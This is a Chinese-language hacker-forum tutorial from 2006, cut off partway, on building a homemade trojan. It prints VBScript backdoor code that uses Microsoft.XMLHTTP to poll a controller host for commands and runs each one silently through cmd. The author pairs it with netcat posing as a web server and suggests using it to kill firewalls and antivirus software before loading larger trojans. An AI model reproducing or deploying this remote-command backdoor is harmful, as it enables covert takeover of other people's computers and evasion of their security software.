[原創(chuàng)]用XMLHttp和nc打造個(gè)性小馬文章標(biāo)題:[原創(chuàng)]用XMLHttp和nc打造個(gè)性小馬頂部 千寂孤城 發(fā)布于:2006-01-3015:07 [樓主][原創(chuàng)]用XMLHttp和nc打造個(gè)性

[原創(chuàng)]用XMLHttp和nc打造個(gè)性小馬
文章標(biāo)題:[原創(chuàng)]用XMLHttp和nc打造個(gè)性小馬頂部 千寂孤城 發(fā)布于:2006-01-3015:07 [樓主][原創(chuàng)]用XMLHttp和nc打造個(gè)性小馬
文章作者：千寂孤城
信息來(lái)源：邪惡八進(jìn)制信息安全團(tuán)隊(duì)

注：本文已發(fā)表在2006年1月的《黑客X檔案》雜志上，版權(quán)歸其所有。轉(zhuǎn)載請(qǐng)保留版權(quán)字樣

在這么一個(gè)良駒滿天飛的年代，養(yǎng)馬養(yǎng)久了會(huì)產(chǎn)生了一種自己造個(gè)小馬的沖動(dòng)。今天閑來(lái)無(wú)事，于是我用Microsoft.XMLHTTP控件 NC打造了一只簡(jiǎn)易木馬。本文敘述了我造馬的探索過(guò)程，很菜的。
先說(shuō)一下Microsoft.XMLHTTP控件。它是為支持XML而設(shè)計(jì)的對(duì)象，通過(guò)http協(xié)議訪問(wèn)網(wǎng)絡(luò)，給網(wǎng)站發(fā)送http請(qǐng)求，可以是POST也可以是GET，也就是說(shuō)相當(dāng)于一個(gè)瀏覽器（正因?yàn)槿绱薓icrosoft.XMLHTTP也經(jīng)常被用來(lái)寫(xiě)跨站漏洞利用程序和SQL注入程序）。該控件自windows98以來(lái)就一直是系統(tǒng)默認(rèn)自帶的控件，并且被系統(tǒng)認(rèn)為是安全的！所以可以從一定程度上穿越防火墻。我的思路就是服務(wù)端利用Microsoft.XMLHTTP來(lái)從客戶端獲取要執(zhí)行的命令，而客戶端利用NC來(lái)偽裝成web服務(wù)器提供數(shù)據(jù)給服務(wù)端的Microsoft.XMLHTTP。

一、服務(wù)端
要調(diào)用Microsoft.XMLHTTP的方法很多，由于是探索階段，為了方便代碼修改，我們用VBS腳本來(lái)實(shí)現(xiàn)。服務(wù)端ok.vbs的代碼如下：


'OnErrorResumeNext 容錯(cuò)語(yǔ)句，出了錯(cuò)別打小報(bào)告
SetHttp=CreateObject("Microsoft.XMLHTTP")
SetShell=CreateObject("Wscript.Shell")
'Do
Http.Open"Get","http://127.0.0.1",False'這里本來(lái)是填客戶端的ip，由于只是探索階段，填了127.0.0.1。
Http.Send
a=Http.ResponseText '獲得數(shù)據(jù)，這將作為要執(zhí)行命令字符串
Wscript.Echoa '看看獲得的是什么數(shù)據(jù)。這一句是調(diào)試用的，最后會(huì)刪掉。
Shell.Run"cmd/c"&a,0 '這里是執(zhí)行命令
'Wscript.Sleep1000 每秒鐘循環(huán)一次
'Loop
'由于是探索階段，容錯(cuò)語(yǔ)句和循環(huán)語(yǔ)句暫時(shí)注釋掉


很簡(jiǎn)單吧？就是說(shuō)向客戶端發(fā)送請(qǐng)求，然后獲得反饋信息，而這個(gè)反饋信息就是要執(zhí)行的命令。這個(gè)過(guò)程每隔一秒重復(fù)一次?？雌饋?lái)很簡(jiǎn)陋吧？其實(shí)還是有點(diǎn)用處的，畢竟是自己寫(xiě)的。也可以用來(lái)充當(dāng)先行兵：先殺掉防火墻和殺毒軟件再配合ftp命令傳送文件，運(yùn)行大型木馬。方正是搞著玩的。
多說(shuō)一句，看到那個(gè)Http.ResponseText了嗎？有很多人不知道有這個(gè)東西，只會(huì)用Http.ResponseBody獲得信息（這樣獲得的數(shù)據(jù)是二進(jìn)制的），然后又寫(xiě)個(gè)BinToStr函數(shù)來(lái)把數(shù)據(jù)轉(zhuǎn)換成字符串，其實(shí)用Http.ResponseText就可以直接得到字符串型的數(shù)據(jù)。

二、客戶端
如果你想用你的網(wǎng)頁(yè)空間來(lái)控制對(duì)方的話，那就用不著NC了。比如我的空間是ht